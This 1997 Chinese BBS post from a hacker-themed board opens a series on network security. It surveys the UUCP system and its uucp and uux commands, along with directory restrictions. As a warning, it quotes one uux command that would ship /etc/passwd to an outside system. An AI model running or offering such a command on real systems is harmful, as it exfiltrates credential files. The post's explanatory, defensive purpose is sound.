发信人: netman.bbs@cs3.xmu.edu.cn (邂逅), 信区: cnhacker
标  题: 网络安全(1)
发信站: cs3 BBS (Mon Jun 16 13:50:28 1997)
转信站: Lilac!ustcnews!ustcnews!sjtunews!cs3
出  处: cs3.xmu.edu.cn

    本文主要讨论网络和数据通讯安全,分为六个部分.第一部分概述最大,最老
的UNIX网络UUCP系统;第二部分讨论UUCP的安全;第三部分讨论新HONEY DANBER
UUCP及安全特点;第四部分讨论其它的UNIX网络,其中包括RJE和NSC;第五部分讨
论通讯的物理安全;最后一部分讨论Sun Microsystem公司的Sun OS系统的网络
安全.

1.UUCP系统概述
    UUCP系统是一组程序,完成文件传输,执行系统之间的命令,维护系统使用情
况的统计,保护安全.UUCP是UNIX系统最广泛使用的网络实用系统,这其中在两个
原因:第一,UUCP是各种UNIX版本都可用的唯一的标准网络系统,第二,UUCP是最
便宜的网络系统.只需要一根电缆连接两个系统,然后就可建立UUCP.如果需要在
相距数百或数千公里远的两个系统间传输数据,中需要两个具有拨号功能的调制
解调器.

  (1)UUCP命令
      UUCP命令之一是uucp,该命令用于两系统间的文件传输,uucp命令格式类
  似于cp命令的格式,只是uucp允许用户有系统间拷贝文件,命令的一般格式如
  下:
      uucp source_file destination_file
      source_file通常是本系统的文件(但不必一定是),destination_file通
  常是另一系统的文件或目录.指定destination_file的格式为:
      system!filename或system!directory.
      uucp给系统管理员提供了一个选项,可以限制传入和传出本系统的uucp文
  件只能传到/usr/spool/uucppublic目录结构中.若告诉uucp将传输的文件存
  放在其他目录中,系统将会送回一个邮件:remote access to path / file
  denied. uucp允许以简化符号~代替/usr/spool/uucppublic/.如:
      uucp names remote!~/john/names
      有时也可用uucp将文件从另一个系统拷贝到本系统,只要将要传入本系统
  的文件指定为源文件(用system!file)即可,如:
      uucp remotes!/usr/john/file1 file1
      如果在远地机限制了文件传输的目录,上条命令不能拷贝到文件.拷贝文
  件到本系统的最安全的方法是:在两个系统上都通过uucppublic目录进行文件
  传输:
      uucp remotes!~/john/file1 ~/pat/file1

  (2)uux命令
      uux命令可用于在另一个系统上执行命令,这一特点称为"远程命令仞行".
  uux最通常的用处是在系统之间发送邮件(mail在其内部执行uux).典型的uux
  请求如下:
      pr listing| uux - "remote1!lp -d pr1"
      这条命令将文件listing格式编排后,再连接到系统remote1的打印机pr1
  上打印出来.uux的选项"-"使uux将本命令的标准输入设备建立为远程命令的
  标准输入设备.当若干个系统中只有一个系统连接了打印机时,常用uux打印文
  件.
      当然必须严格地限制远程命令招待,以保护系统安全.如:
      本系统不应允许其它系统上的用户运行下面的命令:
      uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
      这条命令将使本系统传送/etc/passwd文件到系统outside上,一般地,只
  有几条命令允许地执行.rmail是加限制的mail程序,常常为允许通过uux执行
  的命令之一.也允许rnews(加限制的netnews伪脱机命令)在运行netnews的系
  统上执行,还允许lp在提供了打印设备的系统上运行.

--
※ 来源:·古庙钟声 cs3.xmu.edu.cn·[FROM: freedom@cs3.xmu.edu.]